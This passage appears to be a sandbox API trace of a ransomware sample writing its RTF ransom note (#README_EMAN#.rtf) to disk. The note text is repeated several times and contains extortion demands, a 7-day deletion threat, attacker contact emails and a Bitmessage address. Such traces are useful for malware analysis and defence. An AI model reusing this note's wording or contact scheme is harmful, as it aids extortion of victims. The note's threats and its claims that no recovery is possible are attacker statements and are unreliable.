\\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.995] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\";ÞÒ\x18\x06ýoÏ»Qò\x1bß°ÞbÜØ\x8f\x8cÍ|\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0298.995] WriteFile (in: hFile=0x27c, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.996] CloseHandle (hObject=0x27c) returned 1 [0298.996] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa\\#readme_eman#.rtf")) returned 0xffffffff [0298.996] GetLastError () returned 0x2 [0298.996] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.997] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. 